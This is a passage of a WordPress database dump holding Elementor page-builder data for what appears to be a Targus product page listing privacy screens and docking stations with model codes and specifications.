(ASM154MBP6GL)<\\/h4><\\/li><\\/ol><\\/li><\\/ol>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8d9f0b2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"08b3411\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"524d5be\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1e7590b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"975bc53\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"05e81b1\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"83489ee\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ae0925b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ffd343a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Microsoft Surface<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e15e040\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"9454e78\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"95d0520\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0023768_privacy-screen-microsoft-surface-pro-4-123-clear_grande.jpg?v=1571711583\\\" alt=\\\"Privacy Screen Microsoft Surface Pro 4 (12.3\\\" width=\\\"215\\\" height=\\\"215\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7666383\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"da26715\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">\\u00a0Microsoft Surface Pro 4 (12.3\\\") - Clear<\\/h2><ul id=\\\"product-features\\\"><li>Privacy Screen for the\\u00a0Microsoft Surface Pro 4 (12.3\\\") tablet<\\/li><li>Works with touch screen<\\/li><li>Anti-glare<\\/li><li>Protect the information on your screen from unwanted viewing<\\/li><li>Targus privacy screens are more touch-sensitive than other screens on the market<\\/li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<strong><a href=\\\"https:\\/\\/uk.targus.com\\/pages\\/keep-your-business-your-business\\\" target=\\\"_blank\\\" rel=\\\"noopener\\\"><u><br \\/><\\/u><\\/a><\\/strong><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c1cbe15\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"182a368\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bd7176c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48594a0\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8dd9cb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ff73127\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"99d1e23\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"868d42c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"f0f8ace\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Laptop<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"26653f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7b30821\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"53def41\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0019195_privacy-screen-116w-169_grande.jpg?v=1571711590\\\" alt=\\\"Targus Privacy Screen 11.6\\\" width=\\\"307\\\" height=\\\"307\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e8342f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"76157d9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Privacy Screen<\\/h2><ul id=\\\"product-features\\\"><li>Privacy Screen for tablet, laptop or desktop screens<\\/li><li>Works with touch screens and dual screens<\\/li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort<\\/li><li>Anti-glare<\\/li><li>Protect the information on your screen from unwanted viewing<\\/li><li>Targus privacy screens are more touch-sensitive than other screens on the market<\\/li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<\\/li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips<\\/li><li>Available for :-\\u00a0<\\/li><\\/ul><ol><li style=\\\"list-style-type: none;\\\"><ol><li><h4>Screen 11.6\\\"W - 16:9 (ASF116W9EU)<\\/h4><\\/li><li><h4>Screen 12.1\\\"W - 16:10 (ASF121WEU)<\\/h4><\\/li><li><h4>Screen 12.5\\\"W - 16:9 (ASF125W9EU)<\\/h4><\\/li><li><h4>Screen 13.3\\\"W - 16:10 (ASF133WEU)<\\/h4><\\/li><li><h4>Screen 13.3\\\"W 16:9 - (ASF133W9EU)<\\/h4><\\/li><li><h4>Screen 14.1\\\"W 16:10 - (ASF141WEU)<\\/h4><\\/li><li><h4>Screen 14.1\\\"W 16:9 - (ASF141W9EU)<\\/h4><\\/li><li><h4>Screen 14\\u201d W 16:9 - (ASF14W9EU)<\\/h4><\\/li><li><h4>Screen 15.4\\\"W 16:10 - (ASF154WEU)<\\/h4><\\/li><li><h4>Screen 15.6\\\"W 16:9 - (ASF156W9EU)<\\/h4><\\/li><\\/ol><\\/li><\\/ol>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e074c0b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b967aae\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d7859f1\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bf78a0b\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e0e7dda\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"dcf0830\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9b6734e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1a21cff\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6ccba5d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Monitor<\\/strong><\\/h3>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8be1a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"a283150\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"485c58c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0011\\/9229\\/6515\\/products\\/0019283_privacy-screen-17-43_grande.jpg?v=1571711590\\\" alt=\\\"Targus Privacy Screen 17\\\" width=\\\"269\\\" height=\\\"269\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"70e84b3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"05a0a67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 style=\\\"text-align: center;\\\">Privacy Screen<\\/h2><ul id=\\\"product-features\\\"><li>Privacy Screen for laptop or desktop screens<\\/li><li>Works with touch screens and dual screens<\\/li><li>Blue light filter: Targus Privacy Screens reduce blue light for better protection and reading comfort<\\/li><li>Anti-glare<\\/li><li>Protect the information on your screen from unwanted viewing<\\/li><li>Targus privacy screens are more touch-sensitive than other screens on the market<\\/li><li>Reversible screen: shiny side ensures clarity for viewing inside, matt side reduces glare for viewing outside or in a bright room<\\/li><li>Three easy attachment options: under-bezel tabs, tab guides or re-usable adhesive strips<\\/li><li>Available for :-\\u00a0<\\/li><\\/ul><ol><li style=\\\"list-style-type: none;\\\"><ol><li><h4>Screen 17\\\" 4:3 - (ASF170EU)<\\/h4><\\/li><li><h4>Screen 19\\\" 4:3 - (ASF190EU)<\\/h4><\\/li><li><h4>Screen 19\\\"W 16:10 - (ASF19WEU)<\\/h4><\\/li><li><h4>Screen 21.5\\\"W 16:9 - (ASF215W9EU)<\\/h4><\\/li><li><h4>Screen 22\\\"W 16:10 - (ASF220WEU)<\\/h4><\\/li><li><h4>Screen 22\\\"W 16:9 - (ASF22W9EU)<\\/h4><\\/li><li><h4>Screen 23\\\"W 16:9 - (ASF23W9EU)<\\/h4><\\/li><li><h4>Screen 23.8\\\"W 16:9 - (ASF238W9EU)<\\/h4><\\/li><li><h4>Screen 24\\\"W 16:10 - (ASF24WEU)<\\/h4><\\/li><li><h4>Screen 24\\\"W 16:9 - (ASF24W9EU)<\\/h4><\\/li><li><h4>Screen 27\\\"W 16:9 - (ASF27W9EU)<\\/h4><\\/li><\\/ol><\\/li><\\/ol>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a1a9a8\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"058d29d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d3d9795\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(8928,3701,'_elementor_css','a:5:{s:4:\"time\";i:1573015171;s:5:\"fonts\";a:0:{}s:5:\"icons\";a:0:{}s:6:\"status\";s:4:\"file\";i:0;s:0:\"\";}'),(8931,3702,'_wp_page_template','template-fullwidth.php'),(8932,3702,'_elementor_edit_mode','builder'),(8933,3702,'_elementor_template_type','wp-page'),(8934,3702,'_elementor_version','2.7.4');
INSERT INTO `wpdp_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES (8935,3702,'_elementor_data','[{\"id\":\"4e01da7\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"structure\":\"20\"},\"elements\":[{\"id\":\"542c5ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":28.378},\"elements\":[{\"id\":\"bb7c87a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignright\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/files\\/safeguard-your-valuables-safeport-rugged-ipad-case_300x300.jpg?v=1556613126\\\" alt=\\\"safeport rugged ipad case\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"24999da\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":71.622},\"elements\":[{\"id\":\"d8d0705\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"h3\\\"><span style=\\\"color: #000000;\\\">Safeguard Your Valuables<\\/span><\\/h2><div class=\\\"rte-setting\\\"><p>At Targus, protecting your devices is our top priority. Tablets are easily secured with our premium collection of iPad cases and other\\u00a0tablet cases\\u00a0- including\\u00a0Field-Ready\\u00a0and\\u00a0Rugged\\u00a0options for outdoor and industrial environments. We even have laptop backpacks with hidden zippered pockets and purpose-built compartments for your keys, phone, and other personal belongings.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8e49670\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"1304992\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"22f0297\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"869e28f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#f9f9f9\"},\"elements\":[{\"id\":\"554d7a4\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.324,\"content_position\":\"center\",\"align\":\"center\"},\"elements\":[{\"id\":\"2ddae80\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2 class=\\\"h3\\\"><span style=\\\"color: #000000;\\\">Expand Your Potential<\\/span><\\/h2><div class=\\\"rte-setting\\\"><p>At Targus, we\\u2019re about much more than just laptop backpacks. Our docking stations offer the convenience of universal connections, providing compatibility with multiple brands including Apple (Mac), Dell, Lenovo, HP, Acer, and Asus. This enables you to quickly plug in and connect at your home office, workstation, or on the road. Give your laptop wings as you easily connect to PC accessories like external monitors, speakers, keyboard\\/mice, and laptop chargers.<\\/p><p>4K docking stations\\u00a0are the perfect companion for media and design creatives, offering a quality four times that of 1080P high-definition. Our\\u00a0dual display universal docking stations hook up to two monitors for accelerated productivity and ease of transition between documents. You can find all the cables, adapters, and storage trays you need in our collection of docking station accessories.<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ab11fdc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.676},\"elements\":[{\"id\":\"5677e5f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"alignleft\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/files\\/expand-your-potential-dock520usz-quad-docking-station_300x300.jpg?v=1556613316\\\" alt=\\\"expand your potential dock quad docking station\\\" width=\\\"519\\\" height=\\\"348\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bfcf376\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e6a7498\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"76d9e25\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9bceb31\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6ba22f6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"820d50e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Docking Stations\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#0c0c0c\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5abbfc0\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"b0cb8c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"83d2369\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>USB-C\\u2122 Universal QUAD HD (QVHD) Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK520USZ)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ec5cce0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e58be5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>USB-C\\u2122 Universal DV4K Docking Station with 100W Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK190AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"20620af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7e6c96e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Thunderbolt\\u2122 3 DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK220AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2be6e51\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"14dc97e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0ea999f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/DOCK520USZ_MAIN1_1024x1024.png?v=1558464095\\\" width=\\\"222\\\" height=\\\"222\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"7ebdbda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7adb02b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0042963_usb-c-universal-dv4k-docking-station-with-100w-power_grande.jpg?v=1543989907\\\" alt=\\\"USB-C\\u2122 Universal DV4K Docking Station with 100W Power\\\" width=\\\"210\\\" height=\\\"210\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"dbfcd36\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e79c632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/Dock220_grande.jpg?v=1553684715\\\" alt=\\\"Thunderbolt\\u2122 3 DV4K Docking Station with Power\\\" width=\\\"214\\\" height=\\\"214\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"535b089\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c25718e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65bbbfa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports four HD (1920 x 1080 p60) displays or two 2K (2560 x 1440 p50) displays via 4 HDMI ports<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C 3.0 Port with power (15W non-PD)<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f9e3262\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abcb033\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Supports dual 4K Ultra HD monitor video via 2 DisplayPort\\u2122 (DP 1.2a) and 2 HDMI (HDMI 2.0) ports<\\/li><li>Power Delivery up to 100W<\\/li><li>Thunderbolt\\u2122 3 compatible<\\/li><li>1 USB-C USB 3.1 Gen 1 device port<\\/li><li>Includes 1-meter USB-C to C host cable (detachable) and 1 standard lock slot<\\/li><li>Power tips included to power Acer\\u00ae, ASUS\\u00ae, Compaq\\u00ae, Dell\\u2122, Fujitsu\\u00ae, Gateway\\u00ae, HP\\u00ae, IBM\\/Lenovo\\u2122, and Toshiba<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"e01d2bb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0ddb0f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>0.5M passive 40G, 5A cable (C\\/M to C\\/M)<\\/li><li>Cable lock slot<\\/li><li>Power Delivery 2.0 up to 85W<\\/li><li>Supports dual-display<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4e7b761\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1a06dba\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a805784\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"84a363f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"316cffa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c570e8b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1673a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p style=\\\"text-align: center;\\\">[maxbutton id=\\\"17\\\"]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a345f9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b55e07f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"112d0b9\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1491c5c\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"c1325c6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0c537db\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"pdp-image-gallery\\\"><div class=\\\"MagicToolboxContainer layout-bottom thumbnail-size-small\\\"><h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK171)<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a45b98\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"80b3cd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV4K Docking Station with Power<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK177)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"da54caa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"05b138b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3 style=\\\"text-align: center;\\\"><strong>Universal USB 3.0 DV4K Docking Station<\\/strong><\\/h3><p style=\\\"text-align: center;\\\">(DOCK160AP)<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e1c8e0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\"},\"elements\":[{\"id\":\"1aa8cc8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec212c2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/ACP71USZ_grande.png?v=1551118350\\\" alt=\\\"Universal USB 3.0 DV Docking Station with Power\\\" width=\\\"197\\\" height=\\\"197\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a2463c1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2bb069e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/0027659_universal-usb-30-dv4k-docking-station-with-power_grande.jpg?v=1543990156\\\" alt=\\\"Universal USB 3.0 DV4K Docking Station with Power\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d8676ca\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b6b9ca8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><img class=\\\"aligncenter\\\" src=\\\"https:\\/\\/cdn.shopify.com\\/s\\/files\\/1\\/0121\\/0014\\/1114\\/products\\/dock160usz_grande.png?v=1554473002\\\" alt=\\\"Universal USB 3.0 DV4K Docking Station\\\" width=\\\"205\\\" height=\\\"205\\\" \\/><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5008081\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"c1814d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d78e228\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual 2048 x 1152 at 60Hz 24 bpp color video (single 2K 2560 x 1440 at 50Hz HDMI) leveraging the DisplayLink DL-3900 technology<\\/li><li>19VDC PC laptop power and charging up to 90W<\\/li><li>Removable standalone power and charging tip compartment<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><li>Wedge design for laptop mounting<\\/li><li>Includes detachable 1-meter USB \\u00b5B to A host cable<\\/li><li>Includes 120W AC adapter and power connected purple LED light<\\/li><li>Includes detachable 1-meter DC host power and charging cable<\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d409cb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"362fae6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li>Dual DisplayPort 1.2++ (with MST), dual HDMI 2.0, or one of each external monitor port<\\/li><li>19VDC PC laptop power and charging up to 90W<\\/li><li>Removable standalone tip compartment<\\/li><li>Integrated lock slot accommodates industry-standard security locks<\\/li><li>Wedge design for laptop mounting<\\/li><li>Includes detachable 1-meter USB 3.0 uB to A host cable<\\/li><li>Includes 120W AC adapter and power connected purple LED light<\\/li><li>Includes detachable 1-meter DC host power and charging cable<\\/li><li>Dual 4K2K up to 4096x2160 60Hz (p60) 24 bpp color video monitor support leveraging the DisplayLink DL-6950 